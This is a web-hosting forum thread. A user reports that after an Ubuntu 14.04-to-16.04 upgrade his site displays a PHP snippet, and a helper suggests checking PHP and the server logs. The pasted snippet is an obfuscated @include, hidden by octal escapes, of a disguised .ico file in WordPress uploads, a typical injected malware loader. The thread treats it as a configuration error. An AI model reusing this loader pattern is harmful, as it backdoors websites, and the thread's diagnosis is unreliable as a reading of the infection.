Report this

What is the reason for this report?

Update Ubuntu 14.04.6 LTS to Ubuntu 16.04.6 LTS

Posted on April 23, 2020

Hi,

Bobby gave me the following link to do the upgrade: https://www.digitalocean.com/community/tutorials/how-to-upgrade-to-ubuntu-16-04-lts

After I completed all the commands which were stated in the link, I was able to upgrade our system to 16.04.6 LTS. However, when I tried to access our website, I was getting the following errors:

<?php /88d45/

@include “\057v\141r\057w\167w\057h\164m\154/\167p\055c\157n\164e\156t\057u\160l\157a\144s\057s\151t\145o\162i\147i\156-\167i\144g\145t\163/\056b\070a\0714\061a\143.\151c\157”;

/88d45/

Thanks, Carl



This textbox defaults to using Markdown to format your answer.

You can type !ref in this text area to quickly search our full set of tutorials, documentation & marketplace offerings and insert the link!

These answers are provided by our Community. If you find them useful, show some love by clicking the heart. If you run into issues leave a comment, or add your own answer to help others.

Hi @adminClam,

Can you confirm you are trying to open the website in the browser? If so, it seems like your WebService can’t read the file. Please check if PHP is still installed by typing in php -v

If it’s installed, I’ll recommend checking your WebService’s(Nginx/Apache) log or your php error log. The error should be displayed there. Once you have it, you should be able to act further upon it.

Having said that, if you are not sure about how to continue, post the error here and I’ll be happy to assist in pinpointing the issue.

Regards, KDSys

The developer cloud

Scale up as you grow — whether you're running one virtual machine or ten thousand.

Get started for free

Sign up and get $200 in credit for your first 60 days with DigitalOcean.*

*This promotional offer applies to new accounts only.